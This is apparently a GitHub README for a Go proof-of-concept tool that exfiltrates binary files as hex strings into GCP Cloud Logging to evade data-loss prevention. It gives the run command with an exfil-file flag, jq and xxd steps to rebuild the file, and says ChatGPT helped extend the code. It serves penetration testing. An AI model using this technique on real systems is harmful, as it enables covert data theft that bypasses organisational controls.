/gologexfil

Quick and dirty method do data exfil binary files in the form of hex strings to GCP's cloud logging easily bypassing most DLP

Primary LanguageGoGNU General Public License v3.0GPL-3.0

Usage

Proof of concept data exfil binary files to cloud logging via hex string Dennis Chow dchow[AT]xtecsystems.com March 26, 2023 No expressed or implied warranty or liability.

Related Article

Need some help using the solution? Check out my accompanying article: Covert Data Exfil with GCP and Go

Changes

Revision 2: Pair programmed with ChatGPT v4 using the preview. Lots of enhancements including the 256KB quota limitation per payload entry in GCP. It also helped me add dynamic labeling each chunk as its uploaded and changing the logName so you're not confused when using multiple files and which order you need to reconstruct back on the jq and xxd side. My OLD mostly original code is under main.old and you can see main.rev1 as a intermediate area where ChatGPT started enhancing the code.

Dependencies and environment setup

go init gologexfil/main && go get cloud.google.com/logging

Usage

go run main.go --service-cred <YOUR-ACC-CRED.json> --project-id <YOUR-GCP-PROJECTID> --exfil-file <PATH/TO/FILE.foo>

Note: In pen testing do a go build first go build -o gologexfil ./main.go ensure you have already go get cloud.google.com/logging

Retrieve your file in GCP Cloud Logging either by console and dump to file e.g. cat dump.txt | xxd -r -p > somefile.ext

Alternatively use jq e.g.:

jq -r '.[] | {textPayload} | select(.textPayload != null) | .textPayload' ./downloaded-logs.json > payload-hexdump.text

Screenshots

enter image description here

enter image description here